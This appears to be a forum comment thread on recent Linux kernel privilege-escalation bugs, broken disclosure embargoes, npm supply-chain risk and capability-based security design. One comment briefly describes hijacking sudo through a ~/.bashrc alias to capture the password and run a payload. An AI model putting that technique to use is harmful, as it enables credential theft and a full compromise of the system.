I switched to llama.cpp because of that.
To me it feels more and more that the slopcode world is the opposite philosophy of reproducible builds. It's like the anti methodology of how to work in that regard.
Before, everyone was publishing breaking changes in subminor packages because nobody adhered to any API versioning system standards. Now it's every commit that can break things. That is not an improvement.
When I see pages of obviously generated prose being submitted as any kind of documentation, my eyes just glaze over. I feel so guilty sharing similar stuff too, though to my credit, at least I always lead with a self-written TLDR, the slop is just for reference. But it's so bad, like genuinely distressing tier. I don't want to read all that junk, and more and more gets produced.
Prose type docs have always been my Achilles heel, and this is like the worst possible evolution of that.
For a brief period in the past few weeks, they somehow managed to make a change to ChatGPT Thinking that made it succint. The tone was super fact oriented too. It was honestly like waking up from a fever dream.
> Because the responsible disclosure schedule and the embargo have been broken, no patch exists for any distribution.
I had to do a double take reading that. It’s written something happened and prevented them from following a schedule but seemingly they chose to release the information. I hope I’m missing something where it was forcibly disclosed elsewhere.
Edit: Moments later I refreshed the homepage and saw the announcement. They do claim to have consulted with maintainers
Very odd wording. I assume there’s an interesting/upsetting story here that will come out soon.
the idea that it exists at all is more or less a gentleman's agreement in the engineering world anyway
Especially for a project like the kernel, there's no reasonable way to decide who out of thousands of interested parties should have access first.
Android is a rare exception, as of a few years ago they started a program where phone manufacturers get very favorable early access to AOSP code 4 months ahead of public release.
I don't doubt that the patch reversal + exploit PoC made by a third party is the result of people figuring out how patches work in open source projects like these.
Anyone with access to a good enough LLM can scour through supposedly minor bug fixes that might hide a critical vulnerability rather than doing it all manually. The LLM will probably throw up tons of false positives and miss half the issues, it you only need one or two successes.
With FreeBSD there's never any question of "who should this get reported to".
Not sure what you mean by this. Debian is able to handle coordinated disclosures (when they're actually coordinated), and get embargoed security updates out rapidly without breaking the embargo.
Is there some other aspect of this that you're referencing?
> we're in a similar space -- http://www.getdropbox.com (and part of the yc summer 07 program) basically, sync and backup done right (but for windows and os x). i had the same frustrations as you with existing solutions.
> let me know if it's something you're interested in, or if you want to chat about it sometime.
>drew (at getdropbox.com)
I don't think it's reasonable to say that an OS that lacks it isn't "serious" about security.
For local attackers there may be easier avenues to leak the ASLR slide, but for remote attackers it's almost universally agreed it significantly raises the bar.
>I don't think it's reasonable to say that an OS that lacks it isn't "serious" about security.
When they implemented it in 2019 it had been an 18-year-old mitigation. If you are serious about security, you implement everything that raises the bar. The term "defense-in-depth" exists for a reason, and ASLR is probably one of the easiest and most effective defense-in-depth measures you can implement that doesn't necessarily require changes from existing code other than compiling with -pie.
FreeBSD isn’t secure, I suspect you’re sitting on a pile of 0 days for it?
1. No strong stack protectors.
2. No kASLR.
That's 20-year-old exploit methodology.
They are completely independent operating systems with a distant shared history.
Whereas on Linux, the distros are taking a common Linux kernel source, and combining it with their choice of common userlands like GNU. Debian has the same kernel and GNU userland that Arch and Fedora use. You could take a program compiled for Debian and run it on Arch, which is common these days due to Docker where you're pulling another distro's userland and running it on your distro's kernel. That is how Linux distros are "distros" whereas the BSDs are independent operating systems.
I kid, I kid...
That being said, I'm not suggesting that anyone should judge an entire OS based off of how they handle a single minor report, since everything else that I've seen suggests that FreeBSD takes security reports quite seriously. But then you could also use this same argument for the Linux kernel bug, since it's pretty rare for a patch to be mismanaged like this there too :)
[0]: https://www.maxchernoff.ca/p/luatex-vulnerabilities#timeline
So the issue is bigger than the mishandling of a single issue, it’s a fundamental process issue around security for one of the most impactful projects in the entire space.
Not everyone installs only what is available in pkgsrc.
https://lwn.net/Articles/850098
https://news.ycombinator.com/item?id=26507507
tl;dr: deeply insecure WireGuard implementation committed directly into the FreeBSD kernel with zero review.
Was this process problem fixed?
The preference is for usability over security.
Famously: https://vez.mrsk.me/freebsd-defaults
I appreciate your work on the project, but I can’t in good conscience suggest people switch while are such bad defaults.
In general everything needs to be compiled for FreeBSD, but the ports collection is quite extensive. For example you will find Firefox, wayland, GNOME, KDE, xfce, … even dotnet was on there.
Problems arise with properietary stuff like Spotify, Widevine DRM etc. However, FreeBSD has a Linux emulation layer (providing syscalls), dubbed ‘Linuxulator’. I managed to run the Spotify Linux desktop client but the Spotify website wouldn’t let me log in, didn’t research further. AFAIK the emulator is limited though, not implementing all syscalls.
There is also podman for FreeBSD and in addition to running FreeBSD containers (using Jails under the hood I guess?) it can run Linux containers as well (using the Linuxulator in addition then?).
It also comes with a hypervisor called bhyve if you want to run VMs
There is a handbook on their website describing how to set up a system (including desktop environment) if you want to give it a go.
Once noticed, that's where the exploit explosion erupts, excited exploiters everywhere, emboldened... enticed... excessively encouraged, by your delayed updates.
Attackers can’t push a security update without going through the reporting process (e.g. Github CVE), so they can’t necessarily abuse that easily.
If it does, doesn't that defeat the purpose? If a package is compromised, of course the compromiser will just label their new version as a "security update".
Why would it? Then an attacker would just push compromised code as a "security update". Since the majority of these npm attacks are account-based, the attacker can do everything the actual owner could.
https://github.com/artifact-keeper
An artifact manager. Only get what you approve. So you can get fast updates when needed and consistently known stable when you need it. Does need a little config override - easy work.
I had my own janky tooling for something like it. This is a good project.
If no one is willing to stand up and say "yes this is safe and of acceptable quality", why use it?
It's a software engineering version of the professional engineering stamp.
Also, IME we don't deep dive everything (should we?)
For most stuff we make sure the latest is not-shit and passed test cases. We do have ceremony around version bumps.
Another model is Perl's CPAN where you publish source files only.
Reviewing upstream diffs for every package requires a lot of man hours and most packagers are volunteers. I guess LLMs might help catching some obvious cases.
This naturally doesn't work outside corporations.
I know this is unrelated to the article, but related to the title.
They’re always racing to be the first one to write an article about a case.
We set up our base containers with all the external dependencies already in them and then only update those explicitly when we decide it's time.
This means we might be a bit behind the bleeding edge, but we're also taking on a lot less risk with random supply chain vulns getting instant global distribution.
From TFA:
> Right now would be one of the best times for a supply chain attack via NPM to hit hard.
Given the local kernel root exploits, people pulling npm dependencies have an extra high chance of getting rooted. This includes test systems, build systems, the web server running node.js backend, etc. etc. etc.
This means that there is a significantly greater chance that whatever software you download (not necessarily npm-based) on the internet in these couple days has been unknowingly infected with backdoors, simply due to the fact that the vast majority of servers out there that use npm code have easily exploitable vulnerabilities.
That's why I don't understand:
> If everyone starts waiting a week, their exploits will wait 2 weeks
It's much easier to break into an NPM/Github account and push malicious commits in the few hours a maintainer is sleeping than it is to push something out and not have it noticed for 2 weeks.
There are lists of attacks which had an exposure window which was much shorter than 2 weeks:
https://daniakash.com/posts/simplest-supply-chain-defense/ https://blog.yossarian.net/2025/11/21/We-should-all-be-using...
Say hypothetically that 20% of attack slip through, which is still worrying, you can mitigate 80% of attacks by just waiting a week. It's a low risk, high reward strategy.
Just alias sudo to sudo-but-also-keep-password-and-execute-a-payload in ~/.bashrc and wait up to 24 hours. Maybe also simulate some breakage by intercepting other commands and force the user to run 'sudo systemctl' or something sooner rather than later.
this is only scary for rootless containers as it skips an isolation layer, but we've started shipping distroless containers which are not vulnerable to this due to the fact that they lack priviledge escalation commands such as su or sudo.
never trust software to begin with, sandbox everything you can and don't run it on your machine to begin with if possible.
I won't enter into all the details but... It's totally possible to not have the sudo command (or similar) on a system at all and to have su with the setuid bit off.
On my main desktop there's no sudo command there are zero binaries with the setuid bit set.
The only way to get root involves an "out-of-band" access, from another computer, that is not on the regular network [1].
This setup as worked for me since years. And years. And I very rarely need to be root on my desktop. When I do, I just use my out-of-band connection (from a tiny laptop whose only purpose is to perform root operations on my desktop).
For example today: I logged in as root blocked the three modules with the "dirty page" mitigation suggested by the person who reported the exploit.
You're not faking sudo with a mocking-bird on my machine. You're not using "su" from a regular user account. No userns either (no "insmod", no nothing).
Note that it's still possible to have several non-root users logged in as once: but from one user account, you cannot log in as another. You can however switch to TTY2, TTY3, etc. and log in as another user. And the whole XKCD about "get local account, get everything of importance", ain't valid either in my case.
I'm not saying it's perfect but it's not as simple as "get a local shell, wait until user enters 'sudo', get root". No sudo, no su.
It's brutally simple.
And, the best of all, it's a fully usable desktop: I'm using such a setup since years (I've also got servers, including at home, with Proxmox and VMs etc., but that's another topic).
Most people however aren't and will happily run sudo after an npm postinstall script tells them to apt-install turboencabulator for their new frontend framework to function.
but they all have something in common, the issue is that your user is compromised that means the applications running in that user are compromised the only thing you gain is that you can trust your system, you can trust that your system is not compromised which is only relevant with infrastructure since if your user is compromised you're already fucked, multi-user setups with untrusted accounts are inheritly insecure and in infrastrucure the blast radius might be thousands of users that use the said service.
the breakdown looks something like this:
- you heavily compromise a single user <- exploit not relevant
- you compromise a shared setup via a bad user to compromise a lot of users <- should never be used anymore, namespace isolation is the replacement
- you somewhat compromise a lot of users via infra compromise <- where this hurtsThat's my main reason to use "sudo" on the desktop.
I suppose I could install every piece of software locally, either from source or via flatpak, but this is a lot of work and much harder than doing it the easy way and using global install via my distro. Plus, non-distro installs are much more likely to be out of date and contain vulnerabilities of their own.
But there are a lot of academic and research institutions that actually do have good Linux user management. I worked at a pediatric hospital, and the RHEL HPC admins did not mess around in terms of who was allowed to access which patients' data. As someone who was not an admin, it was a huge pain and it should have been. So this bug has pretty serious implications, seems like anyone at that hospital can abscond with a lot of deidentified data. [research HPC not as sensitive as the clinical stuff, which I think was all Windows Server]
Infecting sudo just makes for a quick demo.
If your container has different processes at different user ids, the exploit would still be effective.
It would likely also be able to “modify” read only files mapped from the host.
Something that concerns me more is I use things like gemini-cli or claude-cli via their own, non-sudo accounts with no ssh keys or anything on my laptop, but a LPE means they can find away around such restrictions if they feel like it (and they might).
But it was too convenient. Anyone warning about it or trying to limit the damage was shouted down by people who had no experience of any other way of doing things. "import antigravity" is just too easy to do without.
Well, now we're reaching the "find out" part of the process I guess.
Assuming we survive the gap period where every country chucks what they still have at their worst enemies, I mean. I suppose we can always hit each other with animal bones.
This is one force that operates. Another is that, in an effort to avoid depending on such a big attack surface, people are increasingly rolling their own code (with or without AI help) where they might previously have turned to an open source library.
I think the effect will generally be an increase in vulnerabilities, since the hand-rolled code hasn't had the same amount of time soaking in the real world as the equivalent OS library; there's no reason to assume the average author would magically create fewer bugs than the original OS library authors initially did. But the vulnerabilities will have much narrower scope: If you successfully exploit an OS library, you can hack a large fraction of all the code that uses it, while if you successfully exploit FooCorp's hand-rolled implementation, you can only hack FooCorp. This changes the economic incentive of funding vulnerabilities to exploit -- though less now than in the past, when you couldn't just point an LLM at your target and tell it "plz hack".
Also, even seemingly trivial libraries can have bugs. The infamous leftpad library didn't handle certain edge doses properly.
For supply chain security and bug count, I'll take a focused custom implementation of specific features over a library full of generalized functionality.
> Also, even seemingly trivial libraries can have bugs. The infamous leftpad library didn't handle certain edge doses properly.
This isn't really an argument in favour of having the average programmer reimplement stuff, though. For it to be, you'd have to argue that the leftpad author was unusually sloppy. That may be true in this specific case, but in general, I'm not persuaded that the average OSS author is worse than the average programmer overall. IMHO, contributing your work to an OSS ecosystem is already a mild signal of competence.
On the wider topic of reimplementation: Recently there was an article here about how the latest Ubuntu includes a bunch of coreutils binaries that have been rewritten in Rust. It turns out that, while this presumably reduced the number of memory corruption bugs (there was still one, somehow; I didn't dig into it), it introduced a bunch of new vulnerabilities, mostly caused by creating race conditions between checking a filesystem path and using the path for something.
Because it might grow in future and you want to allow flexibility for that, because it might be the input to or output from some external system that requires XML, because your team might have standardised on always using XML config files, because introducing yet another custom plain text file format just creates unnecessary cognitive load for everyone who has to use it are real-world reasons I can think of.
But really I was just looking for a concrete example where I know the complexity of the implementation has definitely caused vulnerabilities, whether or not the choice to use it to solve the problem at hand was sensible. I have zero love for XML.
The race conditions were indeed TOCTOU bugs. In a sense, the bugs were a result of incorrectly handling shared mutable data, though in this case the mutations were external to Rust.
module.exports = leftpad;
function leftpad (str, len, ch) {
str = String(str);
var i = -1;
ch || (ch = ' ');
len = len - str.length;
while (++i < len) {
str = ch + str;
}
return str;
}
A newer version was: https://github.com/left-pad/left-pad/blob/master/index.js which cached common cases and improved on the loop performance, before String.prototype.padStart() became a thing https://www.npmjs.com/package/string.prototype.padstartBoth old and new versions return a string longer than `len` if the padding char is multiple characters, e.g. leftpad('a', 3, '&&&&') will be longer than 3. That feels like it shouldn't happen.
Have you read this old code? It's terrible and written with no care at all to security often in C. AI is much much better at writing code.
But I think most OSS code isn't like this -- even C code born long ago, if it's still in wide use, has been hardened by now. Examples: Linux kernel, GNU userland, PostgreSQL, Python.
There have been two LPE vulnerability and exploits in the Linux kernel announced today. After the one announced just last week. I don't think as much of the C code born long ago has been as carefully hardened as you think.
(Copy Fail 2 and Dirty Frag today, and Copy Fail last week)
You (anyone, not you personally) write that much code yourself and let's see how well you did in comparison.
Admittedly, not hard to do, but it could save some other folks.
Rivers caught on fire for a hundred years before the EPA was formed.
If I'm to be offended by a single thing in your post that is calling me (names) - is AI Bro. This was undeserved, and cannot be farther from the truth. Not to miss the fact your comment is entirely off topic, and perhaps you see AI bros everywhere now.
We're seeing maintainers retreat from maintaining because the amount of AI slop being pushed at them is too much. How many are just going to hand over the maintenance burden to someone else, and how many of those new maintainers are going to be evil?
The essential problem is that our entire system of developing civilisation-critical software depends on the goodwill of a limited set of people to work for free and publish their work for everyone else to use. This was never sustainable, or even sensible, but because it was easy we based everything on it.
We need to solve the underlying problem: how to sustainably develop and maintain the software we need.
A large part of this is going to have to be: companies that use software to generate profits paying part of those profits towards the development and maintenance of that software. It just can't work any other way. How we do this is an open question that I have no answers for.
This opposed to closed off “products” that change at the whims of the company owning it.
There’s a lot of misconception about how the open source comes to be and very small part, still significant of course, of it was really created for the benefit of a community. There are exceptions, but dig the organisational culture and origins and you’ll see the pattern. Also, thousands of projects are made for the satisfaction of the author himself being highly intelligent and high on algorithmic dopamine.
this is a cornerstone of modern software development. If it died, or if got taken over by a malicious entity, every single company on the planet would have an immediate security problem. Yet the experience of that maintainer is bad verging on terrible [1].
We need to do better than this.
>He emphasized that he has released curl under a free license, so there is no legal problem with what these companies are doing. But, he suggested, these companies might want to think a bit more about the future of the software they depend on.
There is little reason for minimal-restriction licenses to exist other than to allow corporate use without compensation or contribution. I would think by now that any hope that they would voluntarily be any less exploitative than they can would have been dashed.
If you aren't getting paid or working purely for your own benefit, use a protective license. Though, if thinly veiled license violation via LLM is allowed to stand, this won't be enough.
There's a bunch of problems with getting companies to pay for this, too - that sense of entitlement (or even contractual obligation), the ability to control the project with cash, etc.
I don't have any answers or solutions. But I don't think we can hand-wave the problem away.
Like you get when you buy e.g. MS products?
/s
I don't agree with any of that.
Nuclear might be airgapped but what about water, power…?
* with internet access to FOSS via sourceforge and github we got an abundance of building blocks
* with central repositories like CPAN, npm, pip, cargo and docker those building blocks became trivially easy to use
Then LLMs and agents added velocity to building apps and producing yet more components, feeding back into the dependency chain. Worse: new code with unattributed reuse of questionable patterns found in unknowable versions of existing libraries. That is, implicit dependencies on fragments multitude of packages.
This may all end well ultimately, but we're definitely in for a bumpy ride.
Auto-installing random software is the problem. It was a problem when our parents did it, why would it be a good idea for developers to do it?
yolo!
I run a distro that often causes software like this to break because their silent automatic installation typically makes assumptions about Linux systems which don’t apply to mine. However I fear for the many users of most typical distros (and other OS’ in general as it’s not just a Linux-only issue) who are subject to having all sorts of stuff foisted onto their system with little to no opportunity to easily decide what is being heaped upon them.
(Obviously some developers are better or worse than others, so I presume your observation is assuming developer skill as a constant.)
Right now it kinda feels to me like "Open Source" is the Russian army, assuming their sheer numbers and their huge quantity of equipment much off which is decades old.
Meanwhile attackers and bug hunters are like the Ukrainians, using new, inexpensive, and surprisingly powerful tools that none of the Open Source community has ever seen in the past, and for which it has very little defence capability.
The attackers with cheap drones or LLMs are completely overwhelming the old school who perhaps didn't notice how quickly the world has changed around them, or did notice but cannot do anything about quickly enough.
Who exactly is the innocent little Ukraine supposed to be that the big bad open source is supposed to be attacking to, what? take their land and make the OSS leader look powerful and successful at acheiving goals to distract from their fundamental awfulness? And who are the North Korean canon fodder purchased by OSS while we're at it?
Yeah it's just like that, practically the same situation. The authors of gnu cp and ls can't wait to get, idk, something apparently, out of the war they started when they attacked, idk, someone apparently.
> any useful piece of software has been fuzz tested, property tested and formally verified.
That would require effort. Human effort and extra token cost. Not going to happen, people want to rather move fast an break things.
More people are producing more code because of easier tools. Most code is bad. But that's not the tools fault.
And in the end it is a problem of processes and culture.
I am not disagreeing in the main, but I wonder about the net effect. Again, this is total speculation on my part. If I vibe-slop a half dozen apps this week (and I might, just you watch), the overall raw code quality in the universe got worse. But if in the space of the same time, two major security holes got patched (assume there was no net amount of code changed), didn't things actually get better?
We should have:
- OS level capabilities. Launched programs get passed a capability token from the shell (or wherever you launched the program from). All syscalls take a capability as the first argument. So, "open path /foo" becomes open(cap, "/foo"). The capability could correspond to a fake filesystem, real branch of your filesystem, network filesystem or really anything. The program doesn't get to know what kind of sandbox it lives inside.
- Library / language capabilities. When I pull in some 3rd party library - like an npm module - that library should also be passed a capability too, either at import time or per callsite. It shouldn't have read/write access to all other bytes in my program's address space. It shouldn't have access to do anything on my computer as if it were me! The question is: "What is the blast radius of this code?" If the library you're using is malicious or vulnerable, we need to have sane defaults for how much damage can be caused. Calling lib::add(1, 2) shouldn't be able to result in a persistent compromise of my entire computer.
SeL4 has fast, efficient OS level capabilities. Its had them for years. They work great. They're fast - faster than linux in many cases. And tremendously useful. They allow for transparent sandboxing, userland drivers, IPC, security improvements, and more. You can even run linux as a process in sel4. I want an OS that has all the features of my linux desktop, but works like SeL4.
Unfortunately, I don't think any programming language has the kind of language level capabilities I want. Rust is really close. We need a way to restrict a 3rd party crate from calling any unsafe code (including from untrusted dependencies). We need to fix the long standing soundness bugs in rust. And we need a capability based standard library. No more global open() / listen() / etc. Only openat(), and equivalents for all other parts of the OS.
If LLMs keep getting better, I'm going to get an LLM to build all this stuff in a few years if nobody else does it first. Security on modern desktop operating systems is a joke.
Those exploits are in kernel, and the userspace is only calling the normal, allowed calls. Removing global open()/listen()/etc.. with capability-based versions would still allow one to invoke the same kernel bugs.
(Now, using microkernel like seL4 where the kernel drivers are isolated _would_ help, but (1) that's independent from what userspace does, you can have POSIX layer with seL4 and (2) that would be may more context switches, so a performance drop)
Yes they would. Copyfail uses a bug in the linux kernel to write to arbitrary page table entries. A kernel like SeL4 puts the filesystem in a separate process. The kernel doesn't have a filesystem page table entry that it can corrupt.
Even if the bug somehow got in, the exploit chain uses the page table bug to overwrite the code in su. This can be used to get root because su has suid set. In a capability based OS, there is no "su" process to exploit like this.
A lot of these bugs seem to come from linux's monolithic nature meaning (complex code A) + (complex code B) leads to a bug. Microkernels make these sort of problems much harder to exploit because each component is small and easier to audit. And there's much bigger walls up between sections. Kernel ALG support wouldn't have raw access to overwrite page table entries in the first place.
> (2) that would be may more context switches, so a performance drop
I've heard this before. Is it actually true though? The SeL4 devs claim the context switching performance in sel4 is way better than it is in linux. There are only 11 syscalls - so optimising them is easier. Invoking a capability (like a file handle) in sel4 doesn't involve any complex scheduler lookups. Your process just hands your scheduler timeslice to the process on the other end of the invoked capability (like the filesystem driver).
But SeL4 will probably have more TLB flushes. I'm not really sure how expensive they are on modern silicon.
I'd love to see some real benchmarks doing heavy IO or something in linux and sel4. I'm not really sure how it would shake out.
I prefer it’s model of declaring this is what I want to use, any calls to code outside that error out.
- Pledge requires the program drop privileges. Process level caps move the "allowed actions" outside of an application. And they can do that without the application even knowing. This would - for example - let you sandbox an untrusted binary.
- Pledge still leaves an entire application in the same security zone. If your process needs network and disk access, every part of the process - including 3rd party libraries - gets access to the network and disk.
- You can reproduce pledge with caps very easily. Capability libraries generally let you make a child capability. So, cap A has access to resources x, y, z. Make cap B with access to only resource x. You could use this (combined with a global "root cap" in your process) to implement pledge. You can't use pledge to make caps.
To me it’s easier to get a program to let the system know what it needs vs. try to contain it from the outside.
Anyway, have a good one.
One approach is "Trust No Code" and the other is "Trusted code should run safely".
the first one sounds better on paper, but leads to a very complicated system. That said, I haven't worked with jails much or other forms of sandboxing. It just seems to me that to make software function you need escape hatches, and the more of those you have, well, now you're back to plugging exploits with a more complicated system.
It was interesting to me to hear that even though OpenBSD had designed their software to limit permissions even before pledge and unveil were released - upon release they found that a shocking amount of their software actually wasn't following their own rules.
https://blog.plan99.net/why-not-capability-languages-a8e6cbd...
But as pointed out by others, this particular exploit wouldn't be stopped by capabilities. Nor would it be stopped by micro-kernels. The filesystem is a trusted entity on any OS design I'm familiar with as it's what holds the core metadata about what components have what permissions. If you can exploit the filesystem code, you can trivially obtain any permission. That the code runs outside of the CPU's supervisor mode means nothing.
The only techniques we have to stop bugs like this are garbage collection or use of something like Rust's affine type system. You could in principle write a kernel in a language like C#, Java or Kotlin and it would be immune to these sorts of bugs.
This essay only addresses my second point - capabilities within a program. It doesn't address OS level capabilities at all.
But even in the space of programming languages, I find this essay extremely unconvincing. Like, you raise points like this:
> Here are some problems you’ll have to solve in order to sandbox libraries: What is your threat model? How do you stop components tampering with each other’s memory?
The threat model is left pad cryptolockering your computer via a supply chain attack. The solution is to design a language such that if I import leftpad, then call it, my computer can't get hacked.
You stop components tampering with each others' memory by using a memory safe language.
> its main() method must be given a “god object” exposing all the ambient authorities the app begins with
So what? The main function already takes arguments. I don't understand the problem.
Haskell already passes a type object as an argument to anything which does IO. They don't do it for security. Turns out having pure functions separated from non-pure functions is a beautiful thing.
Then there's these weird claims:
> Any mutable global variable is a problem as it may allow one component to violate expectations held by another.
You don't need to ban mutable global variables! Lets imagine we did this in safe rust. I think the only constraint is that a global variable can't be shared over the boundary between crates. But - nobody does that anyway. Even if you did share a global over a crate boundary, the child crate would still only be able to access it through methods on the type.
Sneaky developers could leverage globals to violate the security boundary. But it would be hard to do by accident. Maybe just, don't do that.
Your essay talks about some research project making a capability based java subset. And I understand that the resulting ergonomics weren't very good. But that isn't evidence that capabilities themselves are a bad idea. If a research student wrote a half baked C compiler one time, you wouldn't take that as evidence that C compilers are a bad idea. I do, however, accept that the burden of proof is on me to demonstrate that its a good idea. I hope that I can some day rise to that challenge.
> The filesystem is a trusted entity on any OS design I'm familiar with
Thats not how capability based microkernels like SeL4 work. The filesystem is owned by a specialised process. Other processes only modify files by sending messages to the filesystem process via a capability handle. If nobody created a writable file handle, the file can't be arbitrarily mutated by another module. Copyfail happened because in linux, any code can by default interact with the page table. One piece of code was missing access control checks. In capability based systems, its basically impossible to accidentally forget access control checks like that.
> The only techniques we have to stop bugs like this are garbage collection or use of something like Rust's affine type system. You could in principle write a kernel in a language like C#, Java or Kotlin and it would be immune to these sorts of bugs.
Copyfail is a logic bug. C#, Java or Kotlin wouldn't save you from it at all.
> The solution is to design a language such that if I import leftpad, then call it, my computer can't get hacked.
That requirement may seem clear right now, but the moment you talk to other people about your language you'll find there's no agreement on what "get hacked" means. Some people will consider calling exit(0) repeatedly to be "hacked" because it's a DoS attack, others will say no code execution or priv escalation happened, so that's not being hacked. Some will say that left-pad being able to read arbitrary bytes from your address space is being hacked, others will say no harm done and thus it wasn't being hacked. The details matter and you need to nail them down in advance.
It turns out for example that one of the top uses of the Java SecurityManager was just to stop plugins accidentally calling System.exit() and tearing down the whole process. It wasn't even a security goal, really.
> You stop components tampering with each others' memory by using a memory safe language.
That's not enough. See languages like Ruby or JavaScript, which are memory safe but not sandboxable due to all the monkeypatching they allow.
> Haskell already passes a type object as an argument to anything which does IO. They don't do it for security. Turns out having pure functions separated from non-pure functions is a beautiful thing.
But almost nobody uses Haskell, partly because of poor ergonomics like this! So if you want a language that gets wide usage and has a good library ecosystem, monads for everything probably isn't going to take off.
> If nobody created a writable file handle, the file can't be arbitrarily mutated by another module.
We're talking about critical bugs in the filesystem so what the FS processes idea of a file handle is doesn't really matter. If you can confuse or buffer overflow the FS process by sending it messages, you can then edit state inside that process you weren't supposed to be able to access, and as that process controls the security system for everything it's game over. Microkernels have no way to stop this, which is one reason very few operating systems move the core FS out into a separate process. You can't easily survive a crash of the core FS code, and it being exploited is equivalent to an exploit of the core microkernel anyway in terms of adversarial goals. So you might as well just run it in-kernel and reap the performance benefits.
> But almost nobody uses Haskell
Sad, but true
> partly because of poor ergonomics like this!
I'm somewhat dubious that's the reason, partly because I find such ergonomic excellent! Especially those provided by my capability system Bluefin: https://hackage.haskell.org/package/bluefin
Edit: and, ofc, what we're discussing here is Linux packages.
I have one server that has shell users, and I did the "yum update" and "reboot -f" dance last week.
Was that good enough? Oh no.
Here we go again!
All the arrogant asocial coder bros cast aside.
All the poorly reasoned shortcuts due to hustle culture and "git pull the world" engineering, startups aura farm on Twitter/social media about their cool sweatshop labor exploiting tech jobs...
Watching AI come around and the 2010s messes blow up in faces... chefs kiss
Hey it's all web-scale though! Good job!
Which is where the unserious emerges but in a subtle way; taking such unserious things so seriously is not serious behavior. It's anxious and paranoid, aloof and clueless behavior.
Secure in tech skills but unserious otherwise.
Lacking a broad set of skills will make office workers unable to grow a potato inherently paranoid about their job.
What else do you expect, given the economic incentives on one side, and the immaturity of the discipline on the other? Writing robust software requires time, money and competence, in a purely empirical approach, since we have no fundamental theory of software. The pressure is for quantity and features in minimum time. The approaches are incompatible, and economics win every time.
It was merely untenable due to hardware limits and now outdated software development patterns.
Big data SaaS companies were never the end goal. They were a stepping stone to AI. A lab to test AI theory.
So your runway and moat so to speak were never real. Merely temporary science research.
I don't think the wealth should go to billionaires. Nor do I think your life should be spent dancing like a monkey to their organ, while you convince yourself to soothe the soul its for a greater good.
Perhaps your country should engage in substance collective action. Because this whole time you were just a pawn of billionaires who don't know you exist. As such they never cared about providing you assurances. You were just cheaper labor.
Big companies have security roles on multiple levels, enforcing policies and not allowing devs to just install any package. That's not new but started maybe 15 years ago.
One idea I've been entertaining is to not allow transitive imports in packages. It would probably lead to far fewer and more capable packages, and a bigger standard library. Much harder to imagine a left-pad incident in such an ecosystem.
They're not either, every one of these projects contains a gigantic vendor/ folder full of unmaintained libraries, modified so much that keeping up with the latest changes is impossible so they're stuck with whatever version they copied back in 2009.
there's nothing stopping you from using python from 2009 except why would you want to do that to yourself - but the same strategy applies. the reference python implementation is written in C, after all.
The problem is that the UNIX shell model got very successful and is now also used on other platforms with poor package management, so all the language-level packaging system were created instead. But those did not learn from the lessons of Linux distributions. Cargo is particularly bad.
For example, I'm not sure if the world of windows freeware ever moved past this, but very often, the home page for a freeware package will look nearly identical to a page set up to deliver malware. Every package you download you wonder "is this the legit version?". Even push it further, there were multiple examples of sites that were previously trusted for software downloads(SourceForge and the installer debacle) that began packaging spyware or adware into downloads.
With either delivery method, you're not quite safe from supply chain attacks, but with the curated repo, you at least have a single source of packages where you can trust it 99% of the time.
I recall a decade ago listening to native app developers lamenting how web pages were inferior to native apps and gnashing their teeth at why browsers wouldn't learn the lessons of native apps. It was, and remains, a shocking display of self-unawareness to fail to understand why web pages, despite doing many things worse than native apps, managed to do blow native apps out of the water when it comes to doing the things that actually matter to users. This is how it feels listening to the above comment; you have failed to reflect on why both programming language authors and programming language users were pushed to using language-specific package managers in the first place, and you have failed to put forth any improvements to OS-level package managers that would allow them to address those underlying flaws.
Many Golang projects I see in the wild will import a number of dependencies with significant feature overlap with sections of the standard library, or even be intended as a replacement for them. So it seems that having an expansive stdlib isn’t sufficient to avoid deep dependency trees, it probably helps to some degree but it’s definitely not a panacea.
More or less the entire Debian apparatus is an organization devoted to being a C/C++ package manager, and while as an end-user it's adequate for installing applications it's still an enormous pain to use packages as libraries even with apt and friends. And once you get outside of apt, you're in an endless hellscape. People don't seem to understand that the real reason that people love Rust is not because of memory safety (let's be honest, most people are too short-sighted to care about that); it's because of Cargo.
Languages with rich standard libraries provide enough common components that it's feasible to build things using only a small handful of external dependencies. Each of those can be carefully chosen, monitored, and potentially even audited, by an individual or small team.
That doesn't make the resulting software exploit-proof, of course, but it seems to me much less risky than an ecosystem where most programs pull in hundreds of dependencies, all of which receive far less scrutiny than a language's standard library.
Yes, I mean crates like anyerror and syn.
Package managers aren't going anywhere. Even languages that historically bet on large standard libraries have been giving up on that over time (e.g. Java's stdlib comes with XML support but not JSON).
Unfortunately, LLMs are also not cheap enough to just create whole new PL ecosystems from scratch. So we have to focus on the lowest hanging fruits here. That means making sandboxing and containers far more available and easy for developers. Nobody should run "npm install" outside a sandbox.
We need a cultural shift toward code hygiene, which isn't really any different from the norms most cultures develop around food. It's a mix of crude heuristics but the sense of "eeew" is keeping billions of people alive.
Which is to say: Hiding the sausage-making is a core aspect of what makes supply chains profitable.
That isn't a guarantee either, just last month someone compromised the Axios library.
Compare that with the average distro. You would have to compromise the developer infrastructure (repo or website) and publish a new version without them being aware while notifying the maintainer that’s its ok to merge the new package script in the distro repo. Hard to pull off in high profile projects.
They dont wait for the cultures to come back negative to say yes either. They just eat what they are served.
If the restaurant has a foul smell and the food is served by a twitchy waiter who insists that the food totally free, I think most people will think twice.
Today I’m limiting the exposure to dependencies more than ever, and particularly for things that take few hundred lines to implement. It’s a paradigm shift, no less.
But being able to have agents implement pelr5 in rust and make it faster and more secure raises many questions towards the role of open source and consequences of security and supply chain risks.
Then I moved to another company where we had builds that access the Internet. We upgrade things as soon as they come out. And people think this is good practice because we're getting the latest bug fixes. CVEs are reviewed by a security team.
Then a startup with a mix of other practices. Some very good. But we also had a big CVE debt. e.g. we had secure boots on our servers and encrypted drives. We had a pretty good grasp on securing components talking to each other etc.
Everyone seems to think they are doing the right thing. It's impossible to convince the "frequent upgrader" that maybe that's a risk in terms of introducing new issues. We as an industry could really use a better set of practices. Example #1 for me is better in terms of dependency management. In general company #1 had well established security practices and we had really secure products.
I like to think people would agree more on the appropriate method if they saw the risk as large enough.
If you could convince everyone that a nuclear bomb would get dropped on their heads (or a comparably devastating event) if a vulnerability gets in, I highly doubt a company like #2 would still believe they're doing things optimally, for example.
No one in this thread proposed that, or anything that could be reasonably assumed to have meant that.
If you expose people to the true risks instead of allowing them to be ignorant, the conclusion that they might come to is that they shouldn’t develop software at all.
